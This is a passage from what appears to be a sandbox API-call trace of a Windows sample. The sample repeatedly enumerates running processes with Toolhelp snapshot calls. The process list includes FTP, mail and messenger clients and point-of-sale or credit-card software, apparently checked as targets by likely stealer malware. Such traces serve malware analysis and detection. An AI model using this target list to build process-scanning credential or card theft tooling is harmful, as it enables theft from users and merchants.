pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0277.280] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0277.282] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0277.283] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0277.284] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0277.286] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0277.287] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0277.289] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0277.290] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0277.338] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0277.387] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0277.389] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0277.390] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0277.392] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0277.393] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0277.395] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0277.396] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0277.398] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0277.400] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0277.401] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0277.405] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0277.407] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0277.409] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0277.410] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0277.412] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0277.414] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0277.415] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0277.417] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0277.422] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0277.423] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0277.425] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0277.427] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0277.428] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0277.430] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0277.438] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0277.440] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0277.442] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0277.444] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0277.445] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0277.447] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0277.451] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0277.453] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0277.455] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0277.457] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0277.458] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0277.460] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0277.462] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0277.463] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0277.468] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0277.469] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0277.471] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0277.473] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0277.478] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0277.481] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0277.482] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0277.484] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0277.485] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0277.487] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0277.489] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0277.490] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0277.492] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0277.493] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0277.497] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0277.499] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0277.500] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0277.502] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0277.503] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0277.505] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0277.506] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0277.508] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0277.510] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0277.514] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0277.515] CloseHandle (hObject=0x1018) returned 1 [0277.515] Sleep (dwMilliseconds=0x64) [0277.974] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0278.142] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.144] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0278.145] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0278.147] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0278.148] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0278.150] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0278.155] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0278.157] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0278.158] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0278.159] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.161] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.163] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0278.164] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 